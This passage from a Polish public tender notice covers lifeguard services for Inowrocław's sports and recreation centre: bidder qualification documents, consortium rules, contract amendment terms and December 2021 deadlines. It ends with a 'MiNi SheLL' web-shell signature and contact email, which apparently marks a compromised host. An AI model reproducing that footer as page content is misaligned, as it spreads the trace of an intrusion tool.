Państwowego Ratownictwa Medycznego,<br/><br/>2) w celu potwierdzenia spełnienia przez wykonawcę warunków udziału w postępowaniu dotyczącym sytuacji ekonomicznej lub finansowej, Zamawiający żąda złożenia poświadczonej za zgodność z oryginałem kopii polisy ubezpieczeniowej potwierdzającej, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia oraz z potwierdzeniem opłacenia składek,<br/><br/>3) w celu potwierdzenia spełnienia przez wykonawcę warunków udziału w postępowaniu dotyczącym zdolności technicznej lub zawodowej, Zamawiający żąda złożenia:<br/>a) wykazu dwóch usług wykonanych nie wcześniej niż w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których usługi te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty,<br/>b) wykazu osób (ratowników wodnych), skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, <br/>c) wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają do oferty oświadczenie, z którego będzie wynikać, które usługi wykonają poszczególni wykonawcy (jeżeli dotyczy).</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenia zamówienia,<br/>w takim przypadku muszą wykazać, że:<br/>1) wspólnie spełniają warunki udziału w postępowaniu;<br/>2) w stosunku do żadnego z nich nie zachodzi jakakolwiek podstawa do wykluczenia z postępowania na podstawie art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4 ustawy Pzp;<br/>3) ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania;<br/>4) ustanowili pełnomocnika wykonawców występujących wspólnie do reprezentowania ich w postępowaniu o udzielnie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcie umowy w sprawie zamówienia,<br/>a) pełnomocnictwo musi mieć formę pisemną lub kopię potwierdzoną przez notariusza;<br/>oraz<br/>5) przed zawarciem umowy o niniejsze zamówienie publiczne, jeżeli oferta konsorcjum zostanie wybrana jako najkorzystniejsza, Zamawiający wezwie do przedstawienia umowy regulującej współpracę tych wykonawców;<br/>6) przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>7) wykonawcy wspólnie ubiegający się o udzielenie zamówienia mają obowiązek dołączyć do oferty oświadczenie, z którego wynikać będzie, które roboty budowlane wykonają poszczególni wykonawcy.<br/><br/>wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają do oferty oświadczenie, z którego będzie wynikać, które usługi wykonają poszczególni wykonawcy (jeżeli dotyczy) <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Projekt umowy zał. nr 7 do SWZ.<br/>2. Zamawiający dopuszcza możliwość dokonania zmiany postanowień zawartej umowy na podstawie art. 455 ust. 1 lub 2, gdy zachodzi co najmniej jedna z następujących okoliczności, z uwzględnieniem podanych warunków ich wprowadzenia:<br/>1) gdy konieczność zmiany, w tym w zakresie wysokości wynagrodzenia, związana jest ze zmianą powszechnie obowiązujących przepisów prawa (np. w zakresie zmiany wysokości stawki podatku VAT), oraz zmiany wynagrodzenia wynikającej z ilości osobogodzin faktycznie świadczonych usług ratownictwa z powodu nieuwzględnionych innych nie dających się przewidzieć w chwili zawarcia umowy przerw lub zmian w godzinach funkcjonowania pływalni i basenów bądź w dniach funkcjonowania pływalni i basenów,<br/>2) konieczności zmiany umowy w zakresie planowanej (szacowanej) ilości godzin ratownictwa wodnego, w związku z:<br/>a) brakiem możliwości wykonywania usług na skutek obiektywnych warunków atmosferycznych, lub<br/>b) w przypadku działania siły wyższej, wystąpienia niedających się przewidzieć skutków działającej siły wyższej i innych przyczyn, których nie można przewidzieć w tym m.in. przewidzianych w ustawie z dnia 2 marca 2020 r. o szczególnych rozwiązaniach związanych z zapobieganiem, przeciwdziałaniem i zwalczaniem COVID-19, innych chorób zakaźnych oraz wywołanych nimi sytuacji kryzysowych (Dz. U. 2021 r. poz. 2095, z późn. zm.), <br/>lub<br/>c) wstrzymaniem możliwości wykonywania usług przez właściwy organ z przyczyn niezawinionych<br/>przez Wykonawcę,<br/>3) zmianą warunków finansowania przedmiotu zamówienia, spowodowanych zmianami w budżecie (palnie finansowym) Zamawiającego,<br/>4) zmiany podwykonawcy - na pisemny wniosek Wykonawcy, dopuszcza się zmianę podwykonawcy lub rezygnację z udziału podwykonawcy przy realizacji przedmiotu zamówienia. Zamiana może nastąpić wyłącznie po przedstawieniu przez Wykonawcę oświadczenia podwykonawcy o jego rezygnacji z udziału w realizacji przedmiotu zamówienia oraz o braku roszczeń wobec Wykonawcy z tytułu realizacji robót. Jeżeli zmiana dotyczy podmiotu trzeciego, na zasobach którego Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu, Zamawiający dopuści zmianę pod warunkiem, że nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym 1niż wskazane na etapie postępowania o udzielenie zamówienia przez dotychczasowego podwykonawcę<br/>5) zmianą osób skierowanych do realizacji zamówienia pod warunkiem, że nowe osoby będą spełniać wymagania określone dla nich przez Zamawiającego w SWZ;<br/>6) wprowadzeniem zmian w danych Wykonawcy lub Zamawiającego wynikających z dokumentów rejestrowych<br/>- z zastrzeżeniem, że minimalny zakres świadczeń może obejmować 50%<br/>7) w przypadku ograniczenia zakresu zamówienia przez Zamawiającego do wskazanej minimalnej wielkości świadczenia usług ratownictwa wodnego na podstawie art. 433 pkt 4 w zw. z art. 455 ust. 1 pkt 1 ustawy Pzp<br/>- minimalny zakres określono w dokumentach zamówienia.<br/>3. Pozostałe zapisy dotyczące rodzaju i zakresu zmian umowy oraz warunków ich wprowadzenia określone są w SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-16 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://osir-inowroclaw.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-16 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-14</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Postępowanie o udzielenie niniejszego zamówienia publicznego wszczyna się przed podjęciem uchwały zatwierdzającej budżet (Plan finansowy) na 2022 rok przez Radę Miejską Inowrocławia. Niniejsze postępowanie zostanie wszczęte dla zachowania ciągłości funkcjonowania i bezpieczeństwa użytkowników obiektów użyteczności publicznej, realizując zadania własne Miasta Inowrocławia określone w statucie Ośrodka Sportu i Rekreacji (nadany uchwałą Nr XLVI/662/2010 Rady Miejskiej Inowrocławia z dnia 27 września 2010 r. oraz uchwałą Nr XXV/263/2016 Rady Miejskiej Inowrocławia z dnia 19 grudnia 2016 r.).

Creat By MiNi SheLL
Email: jattceo@gmail.com